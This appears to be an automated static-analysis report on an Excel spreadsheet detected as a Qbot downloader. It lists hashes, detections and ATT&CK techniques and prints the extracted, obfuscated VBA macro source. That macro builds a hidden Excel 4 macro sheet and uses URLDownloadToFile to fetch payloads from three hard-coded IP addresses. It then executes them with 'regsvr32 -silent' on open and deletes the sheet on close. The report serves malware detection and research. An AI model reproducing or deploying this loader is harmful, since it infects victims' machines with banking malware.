Qbot — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 fd9f52e739e9ac39…

MALICIOUS

Office (OLE) / .XLS

Size: 542.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-10-23
MD5: 2ff61237e6b57f590e3a9416e7fe1221
SHA-1: af0b8f0505df6ac52e16924d81343652f643a711
SHA-256: fd9f52e739e9ac39c0043229ac1f3f9170ebbb0185e57b0ae23a8687f0226b55
Risk score: 160

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The critical ClamAV detection explicitly names this file as 'Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0', strongly indicating the Qbot family. The presence of an Auto_Open macro (T1059.005) confirms that the malicious VBA code executes automatically upon opening the spreadsheet, likely to download and execute a second-stage payload. The macro's obfuscated nature and truncated content prevent a more detailed analysis of its specific actions.

Heuristics (4)

  • ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 (severity: critical, tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
  • VBA macros detected (severity: medium, 2 related findings, tag: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, tag: OLE_VBA_AUTO)
    Auto_Open macro present: the VBA code runs automatically when the workbook is opened
  • Auto_Close macro (severity: high, tag: OLE_VBA_AUTOCLOSE)
    Auto_Close macro present: the VBA code runs automatically when the workbook is closed

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 80c3786ad171a99d819f2d48dae2a9438239712d9cb9684f883956f63b63d38c
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4388 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
    On Error Resume Next
Application.ScreenUpdating = False


    Sheets("Dashboard").Activate
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False

    Application.ScreenUpdating = True

End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Nolert"
Attribute VB_Base = "0{2AA7BCBC-FAD6-4ECF-A89B-7E8A59A9CC96}{C54C57B5-EA7E-4DB1-953E-3456DC1B31D2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
Excel4IntlMacroSheets.Add.Name = "Boolt"

Retio


Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack
End Sub











Function dfgdf()



Sheets("Boolt").Range("H24") = "h" & "tt" & "p" & ":/" & "/190.14.37.236/"
Sheets("Boolt").Range("H25") = "h" & "tt" & "p" & ":/" & "/101.99.90.73/"
dfgdf1
End Function
Function dfgdf1()
ddddddddd = "h" & "tt" & "p" & ":/" & "/194.36.191.16/"
Sheets("Boolt").Range("H26") = ddddddddd
Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack


End Function

Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Application.ScreenUpdating = False
Biolaster
Sheets("Boolt").Range("I12") = "Kopast"

Sheets("Boolt").Visible = False
Nyrtyfh
dfgdf
End Function
Sub auto_close()


Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Boolt").Delete
   Application.DisplayAlerts = True

End Sub

Function Nyrtyfh()

Sheets("Boolt").Range("G10") = Nolert.Label5.Caption
Sheets("Boolt").Range("G11") = Nolert.Label5.Caption & "1"
Sheets("Boolt").Range("G12") = Nolert.Label5.Caption & "2"

End Function





Attribute VB_Name = "Module2"
Function Retio()
On Error Resume Next

net = "uR"
net1 = "Mon"

Bytruy = "R" & "E" & "G" & "I" & "STER"
Neyrey = "="
JRyf = "E" & "X" & "E" & "C"
Jtruhrdrgdg = "re" & "gs" & "vr" & "32"
agadfg = " -s" & "il" & "en" & "t"
dfdsaf = " .." & "\C" & "el" & "od" & ".w" & "ac"
jgfjgjfhfhf

Sheets("Boolt").Range("I9") = net & "l" & net1
Sheets("Boolt").Range("K18") = ".d" & "a" & "t"


Sheets("Boolt").Range("K17") = "=N" & "O" & "W()"
Sheets("Boolt").Range("H35") = "=" & "H" & "ALT()"




Sheets("Boolt").Range("I17") = Jtruhrdrgdg & agadfg & dfdsaf
Sheets("Boolt").Range("I18") = Jtruhrdrgdg & agadfg & dfdsaf & "1"
Sheets("Boolt").Range("I19") = Jtruhrdrgdg & agadfg & dfdsaf & "2"

Hrosters

Sheets("Boolt").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Boolt").Range("H17") = Neyrey & JRyf & "(I17)"
Sheets("Boolt").Range("H18") = Neyrey & JRyf & "(I18)"
Sheets("Boolt").Range("H19") = Neyrey & JRyf & "(I19)"
gyugg
End Function



Attribute VB_Name = "Module3"
Function gyugg()
Application.Run Sheets("Boolt").Range("H3")

End Function

Attribute VB_Name = "Module4"

Function Hrosters()
Sheets("Boolt").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Boolt").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Boolt").Range("H12"
... (truncated)